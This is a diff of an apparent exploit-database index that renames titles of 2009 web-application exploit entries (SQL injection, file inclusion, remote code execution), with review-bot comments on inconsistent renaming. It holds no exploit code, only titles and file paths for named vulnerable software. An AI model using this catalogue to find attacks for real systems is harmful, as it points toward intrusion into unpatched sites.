-8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0
+8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
@@ -20611,8 +20614,8 @@ id,file,description,date,author,platform,type,port
 8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
-8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - (Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
-8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
+8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
+8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
 8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 - (09.01.22) Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
@@ -20631,22 +20634,22 @@ id,file,description,date,author,platform,type,port
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
 8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Arbitrary File Upload",2009-02-11,ZoRLu,php,webapps,0
 8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 - Cross-Site Scripting / SQL Injection / Cookie Bypass",2009-02-11,x0r,php,webapps,0
-8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities",2009-02-11,"Mehmet Ince",php,webapps,0
+8042,platforms/php/webapps/8042.txt,"dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure",2009-02-11,"Mehmet Ince",php,webapps,0
 8043,platforms/php/webapps/8043.pl,"Bloggeruniverse 2.0 Beta - (editcomments.php id) SQL Injection",2009-02-11,Osirys,php,webapps,0
 8044,platforms/php/webapps/8044.txt,"Den Dating 9.01 - (searchmatch.php) SQL Injection",2009-02-11,nuclear,php,webapps,0
 8045,platforms/php/webapps/8045.pl,"InselPhoto 1.1 - (query) SQL Injection",2009-02-11,Osirys,php,webapps,0
 8046,platforms/php/webapps/8046.txt,"PHP Krazy Image Host Script 1.01 - (viewer.php id) SQL Injection",2009-02-12,x0r,php,webapps,0
 8047,platforms/php/webapps/8047.txt,"Free Joke Script 1.0 - Authentication Bypass / SQL Injection",2009-02-12,Muhacir,php,webapps,0
 8048,platforms/asp/webapps/8048.txt,"Baran CMS 1.0 - Arbitrary .ASP File Upload / File Disclosure / SQL Injection / Cross-Site Scripting / Cookie Manipulation",2009-02-12,"Aria-Security Team",asp,webapps,0
-8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-02-13,nuclear,php,webapps,0
+8049,platforms/php/webapps/8049.txt,"ideacart 0.02 - Local File Inclusion / SQL Injection",2009-02-13,nuclear,php,webapps,0
 8050,platforms/php/webapps/8050.txt,"Vlinks 1.1.6 - 'id' SQL Injection",2009-02-13,JIKO,php,webapps,0
 8052,platforms/php/webapps/8052.pl,"ea-gBook 0.1 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-13,bd0rk,php,webapps,0
 8053,platforms/php/webapps/8053.pl,"BlogWrite 0.91 - Remote File Disclosure / SQL Injection",2009-02-13,Osirys,php,webapps,0
-8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - (info.php item) SQL Command Injection",2009-02-13,Osirys,php,webapps,0
+8054,platforms/php/webapps/8054.pl,"CmsFaethon 2.2.0 - info.php item SQL Command Injection",2009-02-13,Osirys,php,webapps,0
 8057,platforms/php/webapps/8057.txt,"InselPhoto 1.1 - Persistent Cross-Site Scripting",2009-02-16,rAWjAW,php,webapps,0
 8060,platforms/php/webapps/8060.php,"Falt4 CMS RC4 - 'FCKeditor' Arbitrary File Upload",2009-02-16,Sp3shial,php,webapps,0
 8061,platforms/php/webapps/8061.pl,"simplePms CMS 0.1.4 - Local File Inclusion / Remote Command Execution",2009-02-16,Osirys,php,webapps,0
-8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
+8062,platforms/php/webapps/8062.txt,"powermovielist 0.14b - SQL Injection / Cross-Site Scripting",2009-02-16,brain[pillow],php,webapps,0
 8063,platforms/php/webapps/8063.txt,"Novaboard 1.0.0 - Multiple Vulnerabilities",2009-02-16,brain[pillow],php,webapps,0
 8064,platforms/php/webapps/8064.pl,"MemHT Portal 4.0.1 - (pvtmsg) Delete All Private Messages Exploit",2009-02-16,StAkeR,php,webapps,0
 8065,platforms/asp/webapps/8065.txt,"SAS Hotel Management System - 'myhotel_info.asp' SQL Injection",2009-02-16,Darkb0x,asp,webapps,0
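Review bot: The new title for row 8054, `info.php item SQL Command Injection`, is inconsistent with how the same phrase is normalised elsewhere in this patch: here only the parentheses are removed, while rows 8089 and 8272 in later hunks become `Command Injection (via SQL Injection)` and `Command Execution (via SQL Injection)`, and row 8276 is shortened to plain `SQL Injection`. Anyone triaging or filtering this index by title gets three different descriptions for what reads like the same class of issue. If the 8054 script behaves like 8089, a title such as `"CmsFaethon 2.2.0 - 'info.php' Command Injection (via SQL Injection)"` would also match the quoting this patch applies to file names elsewhere. Whether `item` is a parameter name that should be kept, quoted, cannot be confirmed from the index alone.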
@@ -20664,7 +20667,7 @@ id,file,description,date,author,platform,type,port
 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - (admin.dat) File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0
 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0
 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - (admin.txt) File Disclosure",2009-02-20,Pouya_Server,php,webapps,0
-8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' SQL Command Injection",2009-02-20,Osirys,php,webapps,0
+8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection (via SQL Injection)",2009-02-20,Osirys,php,webapps,0
 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated",2009-02-23,ahmadbady,php,webapps,0
 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0
 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0
@@ -20684,7 +20687,7 @@ id,file,description,date,author,platform,type,port
 8115,platforms/php/webapps/8115.pl,"Coppermine Photo Gallery 1.4.20 - (IMG) Privilege Escalation",2009-02-26,Inphex,php,webapps,0
 8116,platforms/php/webapps/8116.txt,"BannerManager 0.81 - (Authentication Bypass) SQL Injection",2009-02-26,rootzig,php,webapps,0
 8120,platforms/asp/webapps/8120.txt,"SkyPortal Downloads Manager 1.1 - Remote Contents Change",2009-02-27,ByALBAYX,asp,webapps,0
-8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities",2009-02-27,Corwin,php,webapps,0
+8123,platforms/php/webapps/8123.txt,"irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection",2009-02-27,Corwin,php,webapps,0
 8124,platforms/php/webapps/8124.txt,"Demium CMS 0.2.1b - Multiple Vulnerabilities",2009-02-27,Osirys,php,webapps,0
 8127,platforms/php/webapps/8127.txt,"blogman 0.45 - Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
 8128,platforms/php/webapps/8128.txt,"EZ-Blog 1b - Delete All Posts / SQL Injection",2009-03-02,"Salvatore Fresta",php,webapps,0
@@ -20694,25 +20697,25 @@ id,file,description,date,author,platform,type,port
 8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0
 8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0
 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0
-8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-02,"Salvatore Fresta",php,webapps,0
+8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0
 8140,platforms/php/webapps/8140.txt,"Zabbix 1.6.2 Frontend - Multiple Vulnerabilities",2009-03-03,USH,php,webapps,0
-8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-03-03,"Salvatore Fresta",php,webapps,0
-8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities",2009-03-03,d3b4g,php,webapps,0
+8141,platforms/php/webapps/8141.txt,"blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion",2009-03-03,"Salvatore Fresta",php,webapps,0
+8145,platforms/php/webapps/8145.txt,"tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion",2009-03-03,d3b4g,php,webapps,0
 8150,platforms/php/webapps/8150.txt,"Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting",2009-03-03,Pepelux,php,webapps,0
 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold - (id_news) SQL Injection",2009-03-03,kecemplungkalen,php,webapps,0
 8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
 8164,platforms/php/webapps/8164.php,"Joomla! Component com_iJoomla_archive - Blind SQL Injection",2009-03-05,Stack,php,webapps,0
 8165,platforms/php/webapps/8165.txt,"Blue Eye CMS 1.0.0 - Remote Cookie SQL Injection",2009-03-06,ka0x,php,webapps,0
-8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities",2009-03-06,"Salvatore Fresta",php,webapps,0
+8166,platforms/php/webapps/8166.txt,"Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass",2009-03-06,"Salvatore Fresta",php,webapps,0
 8167,platforms/php/webapps/8167.txt,"isiAJAX 1 - 'praises.php id' SQL Injection",2009-03-06,dun,php,webapps,0
 8168,platforms/php/webapps/8168.txt,"OneOrZero Helpdesk 1.6.5.7 - Local File Inclusion",2009-03-06,dun,php,webapps,0
 8170,platforms/php/webapps/8170.txt,"nForum 1.5 - Multiple SQL Injections",2009-03-09,"Salvatore Fresta",php,webapps,0
 8172,platforms/php/webapps/8172.txt,"cms s.builder 3.7 - Remote File Inclusion",2009-03-09,cr0w,php,webapps,0
-8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0
+8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (SQL into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0
 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0
 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
 8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0
-8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
+8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - 'bookid' Parameter SQL Injection",2009-03-09,elusiven,php,webapps,0
 8188,platforms/php/webapps/8188.txt,"CMS WEBjump! - Multiple SQL Injections",2009-03-10,M3NW5,php,webapps,0
 8194,platforms/php/webapps/8194.txt,"PHP-Fusion Mod Book Panel - 'course_id' Parameter SQL Injection",2009-03-10,SuB-ZeRo,php,webapps,0
@@ -20721,9 +20724,9 @@ id,file,description,date,author,platform,type,port
 8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0
 8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps,0
 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0
-8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0
+8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - Cross-Site Scripting / SQL Injection",2009-03-12,XaDoS,php,webapps,0
 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0
-8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - (Authentication Bypass) SQL Injection",2009-03-13,"Virangar Security",php,webapps,0
+8209,platforms/php/webapps/8209.txt,"Kim Websites 1.0 - Authentication Bypass",2009-03-13,"Virangar Security",php,webapps,0
 8210,platforms/php/webapps/8210.txt,"UBB.Threads 5.5.1 - (message) SQL Injection",2009-03-16,s4squatch,php,webapps,0
 8216,platforms/php/webapps/8216.txt,"Beerwin's PHPLinkAdmin 1.0 - Remote File Inclusion / SQL Injection",2009-03-16,SirGod,php,webapps,0
 8217,platforms/php/webapps/8217.txt,"YAP 1.1.1 - Blind SQL Injection / SQL Injection",2009-03-16,SirGod,php,webapps,0
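Review bot: Row 8209 loses its vulnerability class in the second hunk on this line: `(Authentication Bypass) SQL Injection` becomes just `Authentication Bypass`, so a title search for SQL injection entries no longer returns it. The neighbouring rows that carried the same `(Authentication Bypass) SQL Injection` wording are left untouched by this patch, which makes the index inconsistent for the same pattern. Row 8277 further down this file keeps both facts as `Authentication Bypass (SQL Injection)`; the same form here, `"Kim Websites 1.0 - Authentication Bypass (SQL Injection)"`, would preserve the root cause, assuming the bypass is achieved through SQL injection as the old title states.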
@@ -20736,17 +20739,17 @@ id,file,description,date,author,platform,type,port
 8238,platforms/php/webapps/8238.txt,"Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection",2009-03-18,boom3rang,php,webapps,0
 8239,platforms/php/webapps/8239.txt,"Pivot 1.40.6 - Arbitrary File Deletion",2009-03-18,"Alfons Luja",php,webapps,0
 8240,platforms/php/webapps/8240.txt,"DeluxeBB 1.3 - 'qorder' Parameter SQL Injection",2009-03-18,girex,php,webapps,0
-8243,platforms/php/webapps/8243.txt,"Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities",2009-03-19,Fireshot,php,webapps,0
+8243,platforms/php/webapps/8243.txt,"Bloginator 1a - Cookie Bypass / SQL Injection",2009-03-19,Fireshot,php,webapps,0
 8244,platforms/php/webapps/8244.txt,"Bloginator 1a - SQL Injection / Command Injection (via Cookie Bypass Exploit)",2009-03-19,Fireshot,php,webapps,0
 8247,platforms/cgi/webapps/8247.txt,"Hannon Hill Cascade Server - Authenticated Command Execution",2009-03-19,"Emory University",cgi,webapps,0
-8252,platforms/php/webapps/8252.txt,"Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-20,"Justin Keane",php,webapps,0
+8252,platforms/php/webapps/8252.txt,"Pixie CMS - Cross-Site Scripting / SQL Injection",2009-03-20,"Justin Keane",php,webapps,0
 8254,platforms/php/webapps/8254.pl,"WBB3 rGallery 1.2.3 - (UserGallery) Blind SQL Injection",2009-03-23,Invisibility,php,webapps,0
 8255,platforms/php/webapps/8255.txt,"Supernews 1.5 - (valor.php noticia) SQL Injection",2009-03-23,p3s0k!,php,webapps,0
 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 - (get_read.php section) SQL Injection",2009-03-23,dun,php,webapps,0
 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution",2009-03-23,YOUCODE,php,webapps,0
 8271,platforms/php/webapps/8271.php,"Pluck CMS 4.6.1 - 'module_pages_site.php' Local File Inclusion",2009-03-23,"Alfons Luja",php,webapps,0
-8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - SQL Command Execution",2009-03-23,darkjoker,php,webapps,0
-8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection",2009-03-23,Osirys,php,webapps,0
+8272,platforms/php/webapps/8272.pl,"Codice CMS 2 - Command Execution (via SQL Injection)",2009-03-23,darkjoker,php,webapps,0
+8276,platforms/php/webapps/8276.pl,"Syzygy CMS 0.3 - Local File Inclusion / SQL Injection",2009-03-23,Osirys,php,webapps,0
 8277,platforms/php/webapps/8277.txt,"Free Arcade Script 1.0 - Authentication Bypass (SQL Injection) / Arbitrary File Upload",2009-03-23,Mr.Skonnie,php,webapps,0
 8278,platforms/php/webapps/8278.txt,"Jinzora Media Jukebox 2.8 - (name) Local File Inclusion",2009-03-24,dun,php,webapps,0
 8279,platforms/php/webapps/8279.txt,"PHPizabi 0.848b C1 HFP1 - Privilege Escalation",2009-03-24,Nine:Situations:Group,php,webapps,0
@@ -20755,7 +20758,7 @@ id,file,description,date,author,platform,type,port
 8288,platforms/php/webapps/8288.txt,"WeBid 0.7.3 RC9 - (upldgallery.php) Arbitrary File Upload",2009-03-25,"Ahmad Pay",php,webapps,0
 8289,platforms/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,php,webapps,0
 8290,platforms/php/webapps/8290.txt,"blogplus 1.0 - Multiple Local File Inclusion",2009-03-26,ahmadbady,php,webapps,0
-8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities",2009-03-26,SirGod,php,webapps,0
+8291,platforms/php/webapps/8291.txt,"acute control panel 1.0.0 - SQL Injection / Remote File Inclusion",2009-03-26,SirGod,php,webapps,0
 8292,platforms/php/webapps/8292.txt,"Simply Classified 0.2 - (category_id) SQL Injection",2009-03-27,G4N0K,php,webapps,0
 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
@@ -20764,7 +20767,7 @@ id,file,description,date,author,platform,type,port
 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0
 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0
-8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities",2009-03-30,AnGeL25dZ,asp,webapps,0
+8307,platforms/asp/webapps/8307.txt,"Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass",2009-03-30,AnGeL25dZ,asp,webapps,0
 8309,platforms/php/webapps/8309.txt,"BandSite CMS 1.1.4 - 'members.php' SQL Injection",2009-03-30,SirGod,php,webapps,0
 8315,platforms/php/webapps/8315.txt,"gravy media CMS 1.07 - Multiple Vulnerabilities",2009-03-30,x0r,php,webapps,0
 8317,platforms/php/webapps/8317.pl,"X-Forum 0.6.2 - Remote Command Execution",2009-03-30,Osirys,php,webapps,0
@@ -20822,8 +20825,8 @@ id,file,description,date,author,platform,type,port
 8417,platforms/php/webapps/8417.txt,"e107 Plugin userjournals_menu - 'blog.id' SQL Injection",2009-04-13,boom3rang,php,webapps,0
 8418,platforms/php/webapps/8418.pl,"ASP Product Catalog 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Remote Exploits",2009-04-13,AlpHaNiX,php,webapps,0
 8423,platforms/php/webapps/8423.txt,"Jamroom 4.0.2 - 't' Parameter Local File Inclusion",2009-04-14,zxvf,php,webapps,0
-8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0
-8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-14,SirDarckCat,php,webapps,0
+8424,platforms/php/webapps/8424.txt,"ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection",2009-04-14,DSecRG,php,webapps,0
+8425,platforms/php/webapps/8425.txt,"PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting",2009-04-14,SirDarckCat,php,webapps,0
 8431,platforms/php/webapps/8431.txt,"GuestCal 2.1 - (index.php lang) Local File Inclusion",2009-04-14,SirGod,php,webapps,0
 8432,platforms/php/webapps/8432.txt,"Aqua CMS - 'Username' SQL Injection",2009-04-14,halkfild,php,webapps,0
 8433,platforms/php/webapps/8433.txt,"RQms (Rash) 1.2.2 - Multiple SQL Injections",2009-04-14,Dimi4,php,webapps,0
@@ -20859,13 +20862,13 @@ id,file,description,date,author,platform,type,port
 8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
 8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
-8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities",2009-04-20,girex,php,webapps,0
+8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
 8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
 8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
 8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
 8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
 8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
-8493,platforms/php/webapps/8493.txt,"fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities",2009-04-20,YEnH4ckEr,php,webapps,0
+8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0
 8494,platforms/php/webapps/8494.txt,"TotalCalendar 2.4 - (inc_dir) Remote File Inclusion",2009-04-20,DarKdewiL,php,webapps,0
 8495,platforms/php/webapps/8495.pl,"e107 <= 0.7.15 - (extended_user_fields) Blind SQL Injection",2009-04-20,StAkeR,php,webapps,0
 8496,platforms/php/webapps/8496.htm,"TotalCalendar 2.4 - Remote Password Change Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
@@ -20873,28 +20876,28 @@ id,file,description,date,author,platform,type,port
 8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup",2009-04-20,"ThE g0bL!N",php,webapps,0
 8499,platforms/php/webapps/8499.php,"Dokeos Lms 1.8.5 - (whoisonline.php) PHP Code Injection",2009-04-21,EgiX,php,webapps,0
 8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 - (products_id) SQL Injection",2009-04-21,Player,php,webapps,0
-8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
+8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - Local File Inclusion / SQL Injection",2009-04-21,SirGod,php,webapps,0
 8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 - 'Include' Local File Inclusion",2009-04-21,SirGod,php,webapps,0
 8504,platforms/php/webapps/8504.txt,"NotFTP 1.3.1 - (newlang) Local File Inclusion",2009-04-21,Kacper,php,webapps,0
 8505,platforms/php/webapps/8505.txt,"Quick.CMS.Lite 0.5 - 'id' SQL Injection",2009-04-21,Player,php,webapps,0
 8506,platforms/php/webapps/8506.txt,"VS PANEL 7.3.6 - (Cat_ID) SQL Injection",2009-04-21,Player,php,webapps,0
 8508,platforms/php/webapps/8508.txt,"I-Rater Pro/Plantinum 4.0 - (Authentication Bypass) SQL Injection",2009-04-21,Hakxer,php,webapps,0
 8509,platforms/php/webapps/8509.txt,"Studio Lounge Address Book 2.5 - Authentication Bypass",2009-04-21,"ThE g0bL!N",php,webapps,0
-8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - (Local File Inclusion / Arbitrary File Upload / Authentication Bypass/File Disclosure) Multiple Vulnerabilities",2009-04-21,YEnH4ckEr,php,webapps,0
+8510,platforms/php/webapps/8510.txt,"mixedcms 1.0b - Local File Inclusion / Arbitrary File Upload / Authentication Bypass / File Disclosure",2009-04-21,YEnH4ckEr,php,webapps,0
 8513,platforms/php/webapps/8513.pl,"Dokeos Lms 1.8.5 - 'Include' Remote Code Execution",2009-04-22,StAkeR,php,webapps,0
 8514,platforms/php/webapps/8514.txt,"Elkagroup Image Gallery 1.0 - Arbitrary File Upload",2009-04-22,Securitylab.ir,php,webapps,0
 8515,platforms/php/webapps/8515.txt,"5 star Rating 1.2 - (Authentication Bypass) SQL Injection",2009-04-22,zer0day,php,webapps,0
 8516,platforms/php/webapps/8516.txt,"WebPortal CMS 0.8b - Multiple Remote / Local File Inclusion",2009-04-22,ahmadbady,php,webapps,0
 8517,platforms/php/webapps/8517.txt,"Joomla! Component rsmonials - Cross-Site Scripting",2009-04-22,jdc,php,webapps,0
-8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - (Authentication Bypass / Local File Inclusion / Arbitrary File Upload) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
+8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 - Authentication Bypass / Local File Inclusion / Arbitrary File Upload",2009-04-23,YEnH4ckEr,php,webapps,0
 8529,platforms/asp/webapps/8529.txt,"Absolute Form Processor XE-V 1.5 - Insecure Cookie Handling",2009-04-24,ZoRLu,asp,webapps,0
 8530,platforms/asp/webapps/8530.htm,"Absolute Form Processor XE-V 1.5 - Remote Change Password Exploit",2009-04-24,"ThE g0bL!N",asp,webapps,0
-8532,platforms/php/webapps/8532.txt,"photo-rigma.biz 30 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-04-24,YEnH4ckEr,php,webapps,0
